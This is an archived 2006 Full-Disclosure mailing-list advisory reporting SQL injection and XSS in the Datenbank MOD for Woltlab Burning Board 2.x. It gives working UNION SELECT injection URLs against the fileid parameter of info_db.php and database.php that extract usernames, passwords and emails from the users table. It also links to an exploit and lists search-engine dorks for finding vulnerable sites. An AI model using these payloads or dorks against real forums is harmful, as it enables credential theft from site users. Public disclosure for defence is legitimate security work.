lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060302005505.xh3drirr0j4s0sgk@webmail.nukedx.com>
Date: Thu, 02 Mar 2006 00:55:05 +0200
From: nukedx@...edx.com
To: submit@...w0rm.com, full-disclosure@...ts.grok.org.uk,
	bugtraq@...urityfocus.com, info@...audio.de
Subject: Woltlab Burning Board 2.x (Datenbank MOD fileid)
	Multiple Vulnerabilities.


--Security Report--
Advisory: Woltlab Burning Board 2.x (Datenbank MOD fileid) Multiple
Vulnerabilities.
---
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
---
Date: 01/03/06 01:33 AM
---
Contacts:{
ICQ: 10072
MSN/Email: nukedx@...edx.com
Web: http://www.nukedx.com
}
---
Vendor: WbbCoderForum (http://www.wbbcoderforum.de)
Version: Datenbank MOD 2.7 and prior versions must be affected.
About: Via this method remote attacker can inject arbitrary SQL queries to
fileid parameter in this mod if
magic_quotes_gpc = on, if magic_quotes_gpc off remote attacker can make
malicious links for clicking and
when victim clicks this links victim's browser would be inject with XSS.
Level: Critical
MOD Pages: info_db.php , database.php
---
How&Example:
GPC
GET ->
http://[victim]/[WBBDir]/info_db.php?action=file&subkatid=1&noheader=1&fileid=-1/**/[SQL/XSS]
EXAMPLE ->
http://[victim]/[WBBDir]/info_db.php?action=file&subkatid=1&noheader=1&fileid=-1/**/UNION/**/SELECT/**/0,0,0,
username,password,0,0,0,0,0,email,0,0,0,0,0,0,0/**/FROM/**/bb1_users/**/where/**/userid=1
GET ->
http://[victim]/[WBBDir]/database.php?action=file&subkatid=1&noheader=1&fileid=-1/**/[SQL/XSS]
EXAMPLE ->
http://[victim]/[WBBDir]/database.php?action=file&subkatid=1&noheader=1&fileid=-1/**/UNION/**/SELECT/**/0,0,0,
username,password,0,0,0,0,0,email,0,0,0,0,0,0,0/**/FROM/**/bb1_users/**/where/**/userid=1
with this examples remote attacker can leak speficied users login information
from database.
---
Timeline:
* 01/03/2006: Vulnerability found.
* 01/03/2006: Contacted with vendor and waiting reply.
---
Exploit:
http://www.nukedx.com/?getxpl=17
---
Dorks: inurl:info_db.php , inurl:/wbb2/info_db.php , inurl:/board/info_db.php,
inurl:database.php , inurl:/wbb2/database.php , inurl:/board/database.php
allintext:Datenbank Trooper WbbCoderForum.de etc. etc.
---
Original advisory: http://www.nukedx.com/?viewdoc=17

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ